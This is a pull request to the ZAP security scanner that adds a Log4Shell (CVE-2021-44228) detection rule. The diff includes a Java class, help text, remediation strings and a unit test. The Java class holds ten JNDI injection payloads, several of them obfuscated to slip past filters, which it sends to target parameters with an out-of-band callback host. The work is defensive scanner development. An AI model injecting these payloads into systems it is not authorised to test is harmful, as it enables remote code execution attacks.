### PR TITLE
ascanrulesAlpha: Add Log4Shell (CVE-2021-44228) Scan Rule

### DIFF
--- a/addOns/ascanrulesAlpha/CHANGELOG.md
+++ b/addOns/ascanrulesAlpha/CHANGELOG.md
@@ -4,8 +4,12 @@ All notable changes to this add-on will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 
 ## Unreleased
+### Added
+- Log4Shell (CVE-2021-44228) Scan Rule.
+
 ### Changed
 - Update minimum ZAP version to 2.11.1.
+- Depend on the OAST add-on.
 
 ## [33] - 2021-12-06
 ### Changed

--- a/addOns/ascanrulesAlpha/ascanrulesAlpha.gradle.kts
+++ b/addOns/ascanrulesAlpha/ascanrulesAlpha.gradle.kts
@@ -13,6 +13,9 @@ zapAddOn {
                 register("commonlib") {
                     version.set(">= 1.6.0 & < 2.0.0")
                 }
+                register("oast") {
+                    version.set(">= 0.7.0")
+                }
             }
         }
     }
@@ -20,7 +23,9 @@ zapAddOn {
 
 dependencies {
     compileOnly(parent!!.childProjects.get("commonlib")!!)
+    compileOnly(parent!!.childProjects.get("oast")!!)
 
     testImplementation(parent!!.childProjects.get("commonlib")!!)
+    testImplementation(parent!!.childProjects.get("oast")!!)
     testImplementation(project(":testutils"))
 }

--- a/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/Log4ShellScanRule.java
+++ b/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/Log4ShellScanRule.java
@@ -1,0 +1,148 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2021 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha;
+
+import java.util.HashMap;
+import java.util.Map;
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.parosproxy.paros.Constant;
+import org.parosproxy.paros.control.Control;
+import org.parosproxy.paros.core.scanner.AbstractAppParamPlugin;
+import org.parosproxy.paros.core.scanner.Alert;
+import org.parosproxy.paros.core.scanner.Category;
+import org.parosproxy.paros.network.HttpMessage;
+import org.zaproxy.addon.commonlib.CommonAlertTag;
+import org.zaproxy.addon.oast.ExtensionOast;
+import org.zaproxy.zap.model.Tech;
+import org.zaproxy.zap.model.TechSet;
+
+public class Log4ShellScanRule extends AbstractAppParamPlugin {
+
+    private static final Logger LOGGER = LogManager.getLogger(Log4ShellScanRule.class);
+    private static final String PREFIX = "ascanalpha.log4shell.";
+    private static final String[] ATTACK_PATTERNS = {
+        "${jndi:ldap://{0}/abc}",
+        "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{0}}/abc}",
+        "${${::-j}ndi:rmi://{0}}/abc}",
+        "${jndi:rmi://{0}}}",
+        "${${lower:jndi}:${lower:rmi}://{0}}/abc}",
+        "${${lower:${lower:jndi}}:${lower:rmi}://{0}}/abc}",
+        "${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://{0}}/abc}",
+        "${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://{0}/abc}",
+        "${jndi:dns://{0}/abc}",
+        "${jndi:${lower:l}${lower:d}a${lower:p}://{0}/abc}"
+    };
+
+    @Override
+    public int getId() {
+        return 40043;
+    }
+
+    @Override
+    public String getName() {
+        return Constant.messages.getString(PREFIX + "name");
+    }
+
+    @Override
+    public boolean targets(TechSet technologies) {
+        return technologies.includesAny(Tech.JAVA);
+    }
+
+    @Override
+    public String getDescription() {
+        return Constant.messages.getString(PREFIX + "desc");
+    }
+
+    @Override
+    public int getCategory() {
+        return Category.MISC;
+    }
+
+    @Override
+    public String getSolution() {
+        return Constant.messages.getString(PREFIX + "soln");
+    }
+
+    @Override
+    public String getReference() {
+        return Constant.messages.getString(PREFIX + "refs");
+    }
+
+    @Override
+    public int getRisk() {
+        return Alert.RISK_HIGH;
+    }
+
+    @Override
+    public Map<String, String> getAlertTags() {
+        Map<String, String> alertTags =
+                new HashMap<>(
+                        CommonAlertTag.toMap(
+                                CommonAlertTag.OWASP_2021_A06_VULN_COMP,
+                                CommonAlertTag.OWASP_2017_A09_VULN_COMP,
+                                CommonAlertTag.WSTG_V42_INPV_11_CODE_INJ));
+        alertTags.put(ExtensionOast.OAST_ALERT_TAG_KEY, ExtensionOast.OAST_ALERT_TAG_VALUE);
+        return alertTags;
+    }
+
+    @Override
+    public int getCweId() {
+        return 117;
+    }
+
+    @Override
+    public int getWascId() {
+        return 20;
+    }
+
+    @Override
+    public void init() {
+        ExtensionOast extOast =
+                Control.getSingleton().getExtensionLoader().getExtension(ExtensionOast.class);
+        if (extOast == null || extOast.getActiveScanOastService() == null) {
+            getParent().pluginSkipped(this, Constant.messages.getString(PREFIX + "skipped"));
+        }
+    }
+
+    @Override
+    public void scan(HttpMessage msg, String param, String value) {
+        try {
+            ExtensionOast extOast =
+                    Control.getSingleton().getExtensionLoader().getExtension(ExtensionOast.class);
+            for (String attackPattern : ATTACK_PATTERNS) {
+                HttpMessage testMsg = getNewMsg();
+                Alert alert =
+                        newAlert()
+                                .setConfidence(Alert.CONFIDENCE_MEDIUM)
+                                .setParam(param)
+                                .setMessage(testMsg)
+                                .build();
+                String payload = extOast.registerAlertAndGetPayload(alert);
+                String attack = attackPattern.replace("{0}", payload);
+                alert.setAttack(attack);
+                setParameter(testMsg, param, attack);
+                sendAndReceive(testMsg);
+            }
+        } catch (Exception e) {
+            LOGGER.error(e.getMessage(), e);
+        }
+    }
+}

--- a/addOns/ascanrulesAlpha/src/main/javahelp/org/zaproxy/zap/extension/ascanrulesAlpha/resources/help/contents/ascanalpha.html
+++ b/addOns/ascanrulesAlpha/src/main/javahelp/org/zaproxy/zap/extension/ascanrulesAlpha/resources/help/contents/ascanalpha.html
@@ -51,5 +51,12 @@ This rule attempts to identify if the Spring Actuators are enabled. Tests for th
 
 Latest code: <a href="https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/SpringActuatorScanRule.java">SpringActuatorScanRule.java</a>
 
+<H2>Log4Shell (CVE-2021-44228)</H2>
+This rule attempts to discover the Log4Shell (<a href="https://www.cve.org/CVERecord?id=CVE-2021-44228">CVE-2021-44228</a>) vulnerability.
+It relies on the OAST add-on to generate out-of-band payloads and verify DNS interactions.
+We recommend that this scan rule is used with header injection enabled for maximum coverage.
+
+Latest code: <a href="https://github.com/zaproxy/zap-extensions/blob/main/addOns/ascanrulesAlpha/src/main/java/org/zaproxy/zap/extension/ascanrulesAlpha/Log4ShellScanRule.java">Log4ShellScanRule.java</a>
+
 </BODY>
 </HTML>

--- a/addOns/ascanrulesAlpha/src/main/resources/org/zaproxy/zap/extension/ascanrulesAlpha/resources/Messages.properties
+++ b/addOns/ascanrulesAlpha/src/main/resources/org/zaproxy/zap/extension/ascanrulesAlpha/resources/Messages.properties
@@ -50,3 +50,8 @@ ascanalpha.springactuator.desc=Spring Actuator for Health is enabled and may rev
 ascanalpha.springactuator.soln=Disable the Health Actuators and other actuators, or restrict them to administrative users.
 ascanalpha.springactuator.refs=https://docs.spring.io/spring-boot/docs/current/actuator-api/htmlsingle/#overview
 
+ascanalpha.log4shell.name=Log4Shell (CVE-2021-44228)
+ascanalpha.log4shell.desc=Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default.
+ascanalpha.log4shell.soln=Upgrade Log4j2 to version 2.15.0 or newer. In previous releases (>2.10) this behavior can be mitigated by setting system property "log4j2.formatMsgNoLookups" to "true" or by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class). Java 8u121 (see https://www.oracle.com/java/technologies/javase/8u121-relnotes.html) protects against remote code execution by defaulting "com.sun.jndi.rmi.object.trustURLCodebase" and "com.sun.jndi.cosnaming.object.trustURLCodebase" to "false".
+ascanalpha.log4shell.refs=https://www.cve.org/CVERecord?id=CVE-2021-44228\nhttps://www.lunasec.io/docs/blog/log4j-zero-day/\nhttps://nvd.nist.gov/vuln/detail/CVE-2021-44228
+ascanalpha.log4shell.skipped=no Active Scan OAST service is selected.

--- a/addOns/ascanrulesAlpha/src/test/java/org/zaproxy/zap/extension/ascanrulesAlpha/Log4ShellScanRuleUnitTest.java
+++ b/addOns/ascanrulesAlpha/src/test/java/org/zaproxy/zap/extension/ascanrulesAlpha/Log4ShellScanRuleUnitTest.java
@@ -1,0 +1,44 @@
+/*
+ * Zed Attack Proxy (ZAP) and its related class files.
+ *
+ * ZAP is an HTTP/HTTPS proxy for assessing web application security.
+ *
+ * Copyright 2021 The ZAP Development Team
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ *     http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+package org.zaproxy.zap.extension.ascanrulesAlpha;
+
+import static org.hamcrest.MatcherAssert.assertThat;
+import static org.hamcrest.Matchers.equalTo;
+import static org.hamcrest.Matchers.is;
+
+import org.junit.jupiter.api.Test;
+import org.zaproxy.zap.model.Tech;
+import org.zaproxy.zap.model.TechSet;
+
+class Log4ShellScanRuleUnitTest extends ActiveScannerTest<Log4ShellScanRule> {
+
+    @Override
+    protected Log4ShellScanRule createScanner() {
+        return new Log4ShellScanRule();
+    }
+
+    @Test
+    void shouldTargetJavaApps() {
+        // Given
+        TechSet techSet = techSet(Tech.JAVA);
+        // Then
+        assertThat(rule.targets(techSet), is(equalTo(true)));
+    }
+}


### PR DESCRIPTION
Steps for testing:
1. Run the vulnerable app: `docker run -p 8000:8080 ghcr.io/christophetd/log4shell-vulnerable-app` (from  https://github.com/christophetd/log4shell-vulnerable-app)
1. Send a manual request to the hosted app with the `X-Api-Version` header and a random value.
1. Select BOAST or Interactsh as the active scan service in the OAST options panel.
1. Run an active scan against the vulnerable app node. Ensure that the HTTP Headers checkbox under Input Vectors is enabled. Also enable the Log4Shell scan rule.
1. Click on `Poll Now` in the OAST tab.

![log4shell(1)](https://user-images.githubusercontent.com/16446369/145680932-fe0aaa39-9ac3-4ccb-92a5-bfb18953d1e3.png)

Signed-off-by: ricekot <github@ricekot.com>